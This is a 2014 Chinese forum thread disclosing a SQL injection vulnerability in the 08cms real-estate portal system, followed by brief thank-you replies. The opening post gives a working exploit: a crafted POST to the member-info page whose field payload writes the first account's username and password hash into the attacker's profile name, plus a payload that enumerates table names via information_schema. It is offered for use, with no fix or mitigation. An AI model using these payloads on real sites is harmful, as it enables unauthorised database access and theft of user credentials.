08cms房产门户系统注入漏洞

90_ · 发表于 2014-7-31 20:40:49

##########################################
#  Title ：08cms房产门户系统注入漏洞
#  Team  ：08 Security Team
#  Author ：08安全团队
#  首发： 08安全团队
#######################################

这个漏洞在5月份已经审计出来了，现在将漏洞放出来。

注册一个账号会员资料->基本资料  查看表单得到自己的 MID

[AppleScript] 纯文本查看 复制代码

http://127.0.0.1/house/adminm.php?action=memberinfo&mid=958

（mid）

POST提交 (自己的mid)

[AppleScript] 纯文本查看 复制代码

fmdata[email]=1@qq.com&fmdata[szqy]=\&fmdata[danwei]=,XINGMING=(SELECT CONCAT(mname,0x7c,PASSWORD) FROM cms_members limit 0,1) WHERE MID=958#&bsubmit=1

姓名处即可查看

ps：如何获取表名

[AppleScript] 纯文本查看 复制代码

,SUBJECT=(SELECT table_name FROM information_schema.TABLES WHERE TABLE_SCHEMA =DATABASE() LIMIT 1) WHERE aid=640292#

广岛秋泽 · 发表于 2014-7-31 21:19:45

谢谢分享~

擎天小猪 · 发表于 2014-7-31 21:36:48

谢谢90分享

nextdoor · 发表于 2014-7-31 21:50:02

顶顶，谢谢分享

lainiang55 · 发表于 2014-7-31 23:08:46

提示: 作者被禁止或删除内容自动屏蔽

xiaobo2014 · 发表于 2014-8-1 10:22:08

技术不行，不知道怎么弄。。

老黑 · 发表于 2014-8-3 01:42:33

顶顶，谢谢分享

Alt93 · 发表于 2014-8-3 09:42:36

收藏入库~

blck · 发表于 2014-8-3 21:46:15

注入语句构造过程也不详细说下

hjadhfkj · 发表于 2014-8-9 17:03:33

提示: 作者被禁止或删除内容自动屏蔽

lainiang55 lainiang55 当前离线积分 13 头像被屏蔽	发表于 2014-7-31 23:08:46 \| 显示全部楼层提示: 作者被禁止或删除内容自动屏蔽
lainiang55 lainiang55 当前离线积分 13 头像被屏蔽
	回复支持反对使用道具举报

hjadhfkj hjadhfkj 当前离线积分 5 头像被屏蔽	发表于 2014-8-9 17:03:33 \| 显示全部楼层提示: 作者被禁止或删除内容自动屏蔽
hjadhfkj hjadhfkj 当前离线积分 5 头像被屏蔽
	回复使用道具举报

08cms房产门户系统注入漏洞

相关帖子

指导单位

旗下站点

联系我们